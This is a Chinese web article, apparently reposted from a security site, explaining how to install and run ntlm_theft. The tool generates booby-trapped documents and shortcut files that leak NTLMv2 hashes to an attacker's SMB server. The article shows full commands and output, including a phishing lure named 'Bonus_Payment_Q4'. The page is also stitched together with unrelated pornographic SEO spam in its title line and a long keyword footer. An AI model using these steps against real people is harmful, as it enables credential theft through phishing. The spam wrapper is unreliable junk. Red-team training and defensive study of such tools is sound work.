成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何使用ntlm_theft生成各種類型的NTLMv2哈希竊取文件

安全 網站安全
ntlm_theft是一款基于Python 3開發的開源工具,可以生成21種不同類型的哈希竊取文檔。

關于ntlm_theft

ntlm_theft是一款基于Python 3開發的開源工具,可以生成21種不同類型的哈希竊取文檔。該工具適用于網絡釣魚攻擊,可以用于支持外網SMB流量和內部網絡環境之中。與基于宏的文檔或利用漏洞的文檔相比,這些文件類型的好處在于,所有的這些文件都是使用“預期功能”構建的。

[[429931]]

使用場景

ntlm_theft主要針對滲透測試人員和紅隊研究人員設計,可以幫助研究人員對目標公司員工進行內部網絡釣魚,或大規模測試防病毒和電子郵件網關的安全性。如果外網防火墻上允許出站SMB訪問,則它也可用于外部網絡釣魚。

工具依賴

ntlm_theft基于Python 3開發,因此我們需要在本地環境安裝并配置好Python 3環境,并安裝好xlsxwriter:

  1. pip3 install xlsxwriter 

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

  1. git clone https://github.com/Greenwolf/ntlm_theft.git 

工具參數

ntlm_theft的運行需要提供四個必要參數,一個輸入格式,輸入文件或目錄,以及基礎的運行模式:

  • -g, --generate : 選擇生成所有文件或指定文件類型
  • -s, --server : SMB哈希捕捉服務器的IP地址
  • -f, --filename : 不包含后綴的基礎文件名,之后可以進行重命名

工具運行

下面給出的工具演示樣例中,我們將使用ntlm_theft生成所有文件:

  1. # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test 
  2.  
  3. Created: test/test.scf (BROWSE) 
  4.  
  5. Created: test/test-(url).url (BROWSE) 
  6.  
  7. Created: test/test-(icon).url (BROWSE) 
  8.  
  9. Created: test/test.rtf (OPEN) 
  10.  
  11. Created: test/test-(stylesheet).xml (OPEN) 
  12.  
  13. Created: test/test-(fulldocx).xml (OPEN) 
  14.  
  15. Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
  16.  
  17. Created: test/test-(includepicture).docx (OPEN) 
  18.  
  19. Created: test/test-(remotetempl*ate).docx (OPEN) 
  20.  
  21. Created: test/test-(frameset).docx (OPEN) 
  22.  
  23. Created: test/test.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
  24.  
  25. Created: test/test.asx (OPEN) 
  26.  
  27. Created: test/test.jnlp (OPEN) 
  28.  
  29. Created: test/test.application (DOWNLOAD AND OPEN) 
  30.  
  31. Created: test/test.pdf (OPEN AND ALLOW) 
  32.  
  33. Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) 
  34.  
  35. Generation Complete. 

在下面的工具使用樣例中,我們將使用ntlm_theft僅生成現代文件:

  1. # python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting 
  2.  
  3. Skipping SCF as it does not work on modern Windows 
  4.  
  5. Created: meeting/meeting-(url).url (BROWSE TO FOLDER) 
  6.  
  7. Created: meeting/meeting-(icon).url (BROWSE TO FOLDER) 
  8.  
  9. Created: meeting/meeting.rtf (OPEN) 
  10.  
  11. Created: meeting/meeting-(stylesheet).xml (OPEN) 
  12.  
  13. Created: meeting/meeting-(fulldocx).xml (OPEN) 
  14.  
  15. Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) 
  16.  
  17. Created: meeting/meeting-(includepicture).docx (OPEN) 
  18.  
  19. Created: meeting/meeting-(remotetempl*ate).docx (OPEN) 
  20.  
  21. Created: meeting/meeting-(frameset).docx (OPEN) 
  22.  
  23. Created: meeting/meeting-(externalcell).xlsx (OPEN) 
  24.  
  25. Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY) 
  26.  
  27. Created: meeting/meeting.asx (OPEN) 
  28.  
  29. Created: meeting/meeting.jnlp (OPEN) 
  30.  
  31. Created: meeting/meeting.application (DOWNLOAD AND OPEN) 
  32.  
  33. Created: meeting/meeting.pdf (OPEN AND ALLOW) 
  34.  
  35. Skipping zoom as it does not work on the latest versions 
  36.  
  37. Skipping Autorun.inf as it does not work on modern Windows 
  38.  
  39. Skipping desktop.ini as it does not work on modern Windows 
  40.  
  41. Generation Complete. 

在下面的工具使用樣例中,我們將使用ntlm_theft僅生成一份xlsx文件:

  1. # python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4 
  2.  
  3. Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN) 
  4.  
  5. Generation Complete. 

工具運行截圖

項目地址

ntlm_theft:【GitHub傳送門

 

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2024-03-08 12:04:22

PythonPillow驗證碼

2013-04-27 14:35:40

2009-12-24 17:19:13

WPF觸發器

2023-10-27 07:03:22

字符串String類型

2010-02-26 14:58:14

WCF單例模式

2010-02-04 11:32:01

數據交換技術

2010-02-25 10:29:17

WCF Transac

2010-01-19 16:56:46

交換機光纖端口

2021-04-20 08:32:56

蘋果AppStore違規

2011-07-28 15:16:23

Oracle數據庫聯機日志spfile

2010-01-18 11:13:59

光纖交換機接口

2010-01-14 12:50:26

光纖以太網交換機

2020-12-01 16:21:06

人工智能深度學習機器學習

2020-12-01 10:24:48

人工智能機器學習技術

2025-03-26 11:32:48

2023-02-07 09:32:53

2018-01-08 07:15:18

2019-09-27 10:53:28

RedisPythonJava

2024-12-19 14:00:00

2010-09-29 09:59:22

J2ME配置
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 欧美日韩一二区 | 亚洲伊人精品酒店 | 亚洲精品久久久久久国产精华液 | 成人永久免费视频 | 欧美一区免费在线观看 | 一区二区电影 | 中文字幕在线不卡播放 | 欧美一级久久久猛烈a大片 日韩av免费在线观看 | 天堂亚洲 | japan21xxxxhd美女| 区一区二区三在线观看 | 亚洲网站在线观看 | 国产www在线| 欧美美女爱爱视频 | 美女国内精品自产拍在线播放 | 特黄色一级毛片 | 久色视频在线 | 日韩欧美视频网站 | 国产欧美日韩综合精品一 | 亚洲综合日韩精品欧美综合区 | 日韩在线观看网站 | 国产一区免费视频 | 久久aⅴ乱码一区二区三区 亚洲国产成人精品久久久国产成人一区 | 九色网址| 一区二区精品在线 | 国产成人综合一区二区三区 | 国内av在线 | 99爱国产| 91精品一区二区三区久久久久久 | 午夜精品久久久久99蜜 | 国产91视频一区二区 | 久久久久久毛片免费观看 | 亚洲国产精品福利 | 日韩日韩日韩日韩日韩日韩日韩 | 亚洲精品中文字幕av | 久久天堂 | 久草在线 | 69视频在线播放 | 中文字幕 欧美 日韩 | 久久久国产一区二区三区四区小说 | 亚洲福利一区 |